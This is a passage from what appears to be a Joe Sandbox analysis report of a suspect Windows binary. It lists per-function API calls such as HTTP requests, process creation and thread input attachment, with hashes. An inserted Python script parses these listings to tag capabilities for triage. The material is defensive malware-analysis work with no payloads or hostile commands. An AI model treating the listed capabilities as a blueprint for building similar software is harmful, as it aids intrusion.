                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                        • String ID:
                                                                        • API String ID: 2395222682-0
                                                                        • Opcode ID: fedbcb8c33a80f0d265e7838add32e742503c0d5b8753c445c720827b5df5c0f
                                                                        • Instruction ID: eca1b1ad8c59fcbebe3f1ca8098fa62c68fef798f4cede401b9f75932060d04f
                                                                        • Opcode Fuzzy Hash: fedbcb8c33a80f0d265e7838add32e742503c0d5b8753c445c720827b5df5c0f
                                                                        • Instruction Fuzzy Hash: 8FC12471608300AFC704DF68C985A6BBBE9FF89308F00595DF58AAB251DB71ED06CB52
                                                                        APIs
                                                                        • __lock.LIBCMT ref: 00E9ACC1
                                                                          • Part of subcall function 00E97CF4: __mtinitlocknum.LIBCMT ref: 00E97D06
                                                                          • Part of subcall function 00E97CF4: EnterCriticalSection.KERNEL32(00000000,?,00E97ADD,0000000D), ref: 00E97D1F
                                                                        • __calloc_crt.LIBCMT ref: 00E9ACD2
                                                                          • Part of subcall function 00E96986: __calloc_impl.LIBCMT ref: 00E96995
                                                                          • Part of subcall function 00E96986: Sleep.KERNEL32(00000000,000003BC,00E8F507,?,0000000E), ref: 00E969AC
                                                                        • @_EH4_CallFilterFunc@8.LIBCMT ref: 00E9ACED
                                                                        • GetStartupInfoW.KERNEL32(?,00F26E28,00000064,00E95E91,00F26C70,00000014), ref: 00E9AD46
                                                                        • __calloc_crt.LIBCMT ref: 00E9AD91
                                                                        • GetFileType.KERNEL32(00000001), ref: 00E9ADD8
                                                                        • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 00E9AE11
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                        • String ID:
                                                                        • API String ID: 1426640281-0
                                                                        • Opcode ID: d45173c42f26eb4cfc47340ba5461c6653ea01dafb03c0b11cc09aed38f3039a
                                                                        • Instruction ID: f46a23d013c65460d075e4498607d3a645c330da6708b8bdf9cd972f0cce116d
                                                                        • Opcode Fuzzy Hash: d45173c42f26eb4cfc47340ba5461c6653ea01dafb03c0b11cc09aed38f3039a
                                                                        • Instruction Fuzzy Hash: 5A81E570A063558FDF14CF68C8805ADBBF1AF45328B28526ED4A6BB3D1D7349843CB96
                                                                        APIs
                                                                        • __swprintf.LIBCMT ref: 00EB67FD
                                                                        • __swprintf.LIBCMT ref: 00EB680A
                                                                          • Part of subcall function 00E9172B: __woutput_l.LIBCMT ref: 00E91784
                                                                        • FindResourceW.KERNEL32(?,?,0000000E), ref: 00EB6834
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00EB6840
                                                                        • LockResource.KERNEL32(00000000), ref: 00EB684D
                                                                        • FindResourceW.KERNEL32(?,?,00000003), ref: 00EB686D
                                                                        • LoadResource.KERNEL32(?,00000000), ref: 00EB687F
                                                                        • SizeofResource.KERNEL32(?,00000000), ref: 00EB688E
                                                                        • LockResource.KERNEL32(?), ref: 00EB689A
                                                                        • CreateIconFromResourceEx.USER32(?,?,00000001,00030000,00000000,00000000,00000000), ref: 00EB68F9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Resource$FindLoadLock__swprintf$CreateFromIconSizeof__woutput_l
                                                                        • String ID:
                                                                        • API String ID: 1433390588-0
                                                                        • Opcode ID: eb9e85dfde17a4aa46cd860568ea77e0884fdff12aa915ab79b5849d9d9725fb
                                                                        • Instruction ID: 5b270aa9ee1582d18d21e8f39e332098d82f7e1fb8372a65b2fa28fb0cfe137c
                                                                        • Opcode Fuzzy Hash: eb9e85dfde17a4aa46cd860568ea77e0884fdff12aa915ab79b5849d9d9725fb
                                                                        • Instruction Fuzzy Hash: DF3190B190421AAFEB159FA1ED45AFFBBA9FF48345F004425F902F2150E738D915DBA0
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00EB4047
                                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB405B
                                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 00EB4062
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB4071
                                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 00EB4083
                                                                        • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB409C
                                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB40AE
                                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB40F3
                                                                        • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB4108
                                                                        • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,00EB30A5,?,00000001), ref: 00EB4113
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                        • String ID:
                                                                        • API String ID: 2156557900-0
                                                                        • Opcode ID: 7800ac9877cceb61518a8f7bc496f012b68666a3d281e8cf74a6ec0a339dfaf8
                                                                        • Instruction ID: 489430321326c10bd0cc1cc9c9b08566c487f9ff225a76330d05dafa18c038fd
                                                                        • Opcode Fuzzy Hash: 7800ac9877cceb61518a8f7bc496f012b68666a3d281e8cf74a6ec0a339dfaf8
                                                                        • Instruction Fuzzy Hash: 1A31E1F1901208AFDB11DF19DC85BBA7BAAEB90365F119016F904F62D1CBB49D80CB61
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 00E8B496
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 00E8B4A0
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00E8B4B5
                                                                        • GetStockObject.GDI32(00000005), ref: 00E8B4BD
                                                                        • GetClientRect.USER32(?), ref: 00EEDD63
                                                                        • SendMessageW.USER32(?,00001328,00000000,?), ref: 00EEDD7A
                                                                        • GetWindowDC.USER32(?), ref: 00EEDD86
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 00EEDD95
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00EEDDA7
                                                                        • GetSysColor.USER32(00000005), ref: 00EEDDC5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 3430376129-0
                                                                        • Opcode ID: f13b7b28393f9131f0325bd697b1228c3cbb690bd8a89cf9e59aa3dc38f308cb
                                                                        • Instruction ID: 662ef05e74d20ad962d5ff73daecd3a90f768398cb2b3b1c1d6cbb126790cb4a
                                                                        • Opcode Fuzzy Hash: f13b7b28393f9131f0325bd697b1228c3cbb690bd8a89cf9e59aa3dc38f308cb
                                                                        • Instruction Fuzzy Hash: DF118E31504209EFDB216FA5EC09BF93F66EB85325F108221FA6AB50E1DB310945EF20
                                                                        APIs
                                                                        • EnumChildWindows.USER32(?,00EACF50), ref: 00EACE90
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: ChildEnumWindows
                                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                                        • API String ID: 3555792229-1603158881
                                                                        • Opcode ID: 81a7fd902a20dc4685d30670ca06bfd1e0cd770c437ed3967323266480b09bf7
                                                                        • Instruction ID: 65c4c83d929b406eedd8af2a83cc113f86d663fef30d9d8dfd1c9a57293971a8
                                                                        • Opcode Fuzzy Hash: 81a7fd902a20dc4685d30670ca06bfd1e0cd770c437ed3967323266480b09bf7
                                                                        • Instruction Fuzzy Hash: 82919230A00506AACF18EF60C481BEAFBB5BF49304F60A559E45DBB251DF30795ADBE0
                                                                        APIs
                                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 00E730DC
                                                                        • CoUninitialize.OLE32(?,00000000), ref: 00E73181
                                                                        • UnregisterHotKey.USER32(?), ref: 00E732A9
                                                                        • DestroyWindow.USER32(?), ref: 00EE5079
                                                                        • FreeLibrary.KERNEL32(?), ref: 00EE50F8
                                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00EE5125
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                        • String ID: close all
                                                                        • API String ID: 469580280-3243417748
                                                                        • Opcode ID: 77e8b8ec758dc22a156bdcb39c8eceaefe970dce07e715a5b131934166fc0df0
                                                                        • Instruction ID: d41a13834f305f7248f888691ea928c6056c44524a279a0d64003747ce87b96d
                                                                        • Opcode Fuzzy Hash: 77e8b8ec758dc22a156bdcb39c8eceaefe970dce07e715a5b131934166fc0df0
                                                                        • Instruction Fuzzy Hash: CD9139712012468FC759EF24C895BA9F3E4FF05304F54A2A9E50EB7262DB30AE5ADF50
                                                                        APIs
                                                                        • SetWindowLongW.USER32(?,000000EB), ref: 00E8CC15
                                                                          • Part of subcall function 00E8CCCD: GetClientRect.USER32(?,?), ref: 00E8CCF6
                                                                          • Part of subcall function 00E8CCCD: GetWindowRect.USER32(?,?), ref: 00E8CD37
                                                                          • Part of subcall function 00E8CCCD: ScreenToClient.USER32(?,?), ref: 00E8CD5F
                                                                        • GetDC.USER32 ref: 00EED137
                                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00EED14A
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EED158
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 00EED16D
                                                                        • ReleaseDC.USER32(?,00000000), ref: 00EED175
                                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 00EED200
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                        • String ID: U
                                                                        • API String ID: 4009187628-3372436214
                                                                        • Opcode ID: f40565715f7219893f49ceca490e50ba7b23245e5abbaa9c533bc11ca06392cb
                                                                        • Instruction ID: eca089fdf5223dea10bfd96d35246fc48fbd634dcee86870f2f8bf26456f0e32
                                                                        • Opcode Fuzzy Hash: f40565715f7219893f49ceca490e50ba7b23245e5abbaa9c533bc11ca06392cb
                                                                        • Instruction Fuzzy Hash: 1671F430404249DFCF21DF65CC81AEA7BB6FF49328F286269ED597A2A5D7318841DF60
                                                                        APIs
                                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EC45FF
                                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EC462B
                                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00EC466D
                                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EC4682
                                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC468F
                                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00EC46BF
                                                                        • InternetCloseHandle.WININET(00000000), ref: 00EC4706
                                                                          • Part of subcall function 00EC5052: GetLastError.KERNEL32(?,?,00EC43CC,00000000,00000000,00000001), ref: 00EC5067
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                        • String ID:
                                                                        • API String ID: 1241431887-3916222277
                                                                        • Opcode ID: 297d2121c448614b2917b2a4c3e6bb041688d213b23802b103fea823a410eeee
                                                                        • Instruction ID: 30bc898441dba885f7ecf5fb5fbd741bb436f84d2191e701f68543e28e48b046
                                                                        • Opcode Fuzzy Hash: 297d2121c448614b2917b2a4c3e6bb041688d213b23802b103fea823a410eeee
                                                                        • Instruction Fuzzy Hash: 5C417FB2501209BFEB029F50CD95FFB7BACFF09314F10501AFA05AA185D7B199458BA4
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,00F0DC00), ref: 00ECB715
                                                                        • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00F0DC00), ref: 00ECB749
                                                                        • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00ECB8C1
                                                                        • SysFreeString.OLEAUT32(?), ref: 00ECB8EB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                        • String ID:
                                                                        • API String ID: 560350794-0
                                                                        • Opcode ID: c4339c9245b11e50755839926cbfc66263233f7443087fd0c760414e28c8d4de
                                                                        • Instruction ID: 2f029d7e21a13f52a84e9b7f323397a05b98c3f2a8cdc2cd2ad946974286b248
                                                                        • Opcode Fuzzy Hash: c4339c9245b11e50755839926cbfc66263233f7443087fd0c760414e28c8d4de
                                                                        • Instruction Fuzzy Hash: F2F13C71A00209EFCF14DF94C985EAEB7BAFF88315F109459F945AB250DB32AE46CB50
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00ED24F5
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ED2688
                                                                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ED26AC
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ED26EC
                                                                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00ED270E
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ED286F
                                                                        • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00ED28A1
                                                                        • CloseHandle.KERNEL32(?), ref: 00ED28D0
                                                                        • CloseHandle.KERNEL32(?), ref: 00ED2947
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                        • String ID:
                                                                        • API String ID: 4090791747-0
                                                                        • Opcode ID: bb23c21a54ff435882124fce79f61b84d823768c8d5d60c90a8687da900d221d
                                                                        • Instruction ID: 5ad5ea9b48828d0ef3e5e9f5ea34abd22d3827a1c47b533b3238b57b0e034407
                                                                        • Opcode Fuzzy Hash: bb23c21a54ff435882124fce79f61b84d823768c8d5d60c90a8687da900d221d
                                                                        • Instruction Fuzzy Hash: D2D1AF31604300DFCB14EF24C891A6ABBE5EF95314F14945EFA99AB3A2DB31DC42CB52
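The per-function "APIs" lists above (the WinINet block ending in InternetCloseHandle, and the GetSystemDirectoryW/CreateProcessW block just above) are the parts of a report like this that actually carry capability information, but a full report contains hundreds of such blocks. The parser below is an added example, not part of the report and not Joe Sandbox code: it turns each bullet list into structured records and tags blocks by coarse capability (network, process creation, thread creation), so the blocks worth reading, such as the one that sets WinINet option 0x1F (INTERNET_OPTION_SECURITY_FLAGS), can be found mechanically. The category table is my own grouping, not Joe Sandbox's taxonomy, and the sample input is constructed from two of the blocks above, trimmed.

```python
"""Parse the per-function API listings of a Joe Sandbox report and tag them.

Added example; not part of the report and not Joe Sandbox code.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# One API bullet. Three shapes occur in the report:
#   • HttpSendRequestW.WININET(00000000,...), ref: 00EC468F
#   • _memset.LIBCMT ref: 00ED24F5                        (no argument list)
#   • Part of subcall function 00EC5052: GetLastError.KERNEL32(...), ref: 00EC5067
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<subfn>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# Identifier fields printed under "Similarity" for the same block.
FIELD_LINE = re.compile(
    r"^\s*•\s*(?P<key>API ID|Opcode ID|Instruction ID|String ID):\s*(?P<val>.*?)\s*$"
)

# Assumed capability grouping (my own, not Joe Sandbox's).
MODULE_TAGS = {"WININET": "network", "WINHTTP": "network", "WS2_32": "network"}
API_TAGS = {
    "CreateProcessW": "process-create", "CreateProcessA": "process-create",
    "CreateThread": "thread", "DuplicateHandle": "handle-dup",
    "MoveFileW": "file-write",
}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                      # call-site address in the dump
    subcall_of: Optional[str]     # set when the call sits in a callee


@dataclass
class FunctionBlock:
    calls: List[ApiCall] = field(default_factory=list)
    fields: Dict[str, str] = field(default_factory=dict)

    @property
    def tags(self) -> List[str]:
        found = set()
        for c in self.calls:
            if c.module in MODULE_TAGS:
                found.add(MODULE_TAGS[c.module])
            if c.api in API_TAGS:
                found.add(API_TAGS[c.api])
        return sorted(found)


def parse_blocks(text: str) -> List[FunctionBlock]:
    """Split the report text into blocks, one per 'APIs' header."""
    blocks: List[FunctionBlock] = []
    cur: Optional[FunctionBlock] = None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionBlock()
            blocks.append(cur)
            continue
        if cur is None:           # text before the first block is ignored
            continue
        m = API_LINE.match(line)
        if m:
            raw = m["args"]
            args = [a.strip() for a in raw.split(",")] if raw is not None else []
            cur.calls.append(ApiCall(m["api"], m["module"], args, m["ref"], m["subfn"]))
            continue
        f = FIELD_LINE.match(line)
        if f:
            cur.fields[f["key"]] = f["val"]
    return blocks


def triage(text: str) -> Dict[str, List[str]]:
    """Map Opcode ID -> tags for every block that has at least one tag."""
    out = {}
    for b in parse_blocks(text):
        if b.tags:
            out[b.fields.get("Opcode ID", "?")] = b.tags
    return out


# Constructed sample: two blocks copied from the report and trimmed.
SAMPLE = """\
APIs
• InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00EC45FF
• HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00EC462B
• InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00EC466D
• InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00EC4682
• HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00EC468F
• HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00EC46BF
• InternetCloseHandle.WININET(00000000), ref: 00EC4706
  • Part of subcall function 00EC5052: GetLastError.KERNEL32(?,?,00EC43CC,00000000,00000000,00000001), ref: 00EC5067
Strings
Memory Dump Source
Similarity
• API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
• String ID:
• API String ID: 1241431887-3916222277
• Opcode ID: 297d2121c448614b2917b2a4c3e6bb041688d213b23802b103fea823a410eeee
APIs
• _memset.LIBCMT ref: 00ED24F5
• GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00ED2688
• CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00ED286F
• GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00ED28A1
• CloseHandle.KERNEL32(?), ref: 00ED28D0
Memory Dump Source
Similarity
• API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
• Opcode ID: bb23c21a54ff435882124fce79f61b84d823768c8d5d60c90a8687da900d221d
"""

if __name__ == "__main__":
    for opcode_id, tags in triage(SAMPLE).items():
        print(opcode_id[:16], ", ".join(tags))
```

Run it over the saved report text instead of `SAMPLE` to get one line per tagged block; the Opcode ID lets you jump back to the full entry, and the `ref` addresses on each `ApiCall` are the call sites to set breakpoints on if the dump is loaded in a debugger.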
                                                                        APIs
                                                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00EDB3F4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1673381954.0000000000E71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E70000, based on PE: true
                                                                        • Associated: 00000000.00000002.1673361876.0000000000E70000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000EFD000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673440583.0000000000F1E000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673474923.0000000000F2A000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1673488794.0000000000F34000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_e70000_KSts9xW7qy.jbxd
                                                                        Similarity
                                                                        • API ID: InvalidateRect
                                                                        • String ID:
                                                                        • API String ID: 634782764-0
                                                                        • Opcode ID: 00b28a5643c25584c6e354ae609e81f48caae0eab7f9fe4cf16a0818638824c7
                                                                        • Instruction ID: 6f17dc74545c91fca142af51198a9db945b731f0da562e9563405d40a4cf8a60
                                                                        • Opcode Fuzzy Hash: 00b28a5643c25584c6e354ae609e81f48caae0eab7f9fe4cf16a0818638824c7
                                                                        • Instruction Fuzzy Hash: 21518330500204FEEB249F599C85BAE3BA5EB05328F656017F625F63E1EBB1E942DB50
                                                                        APIs
                                                                        • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00EEDB1B
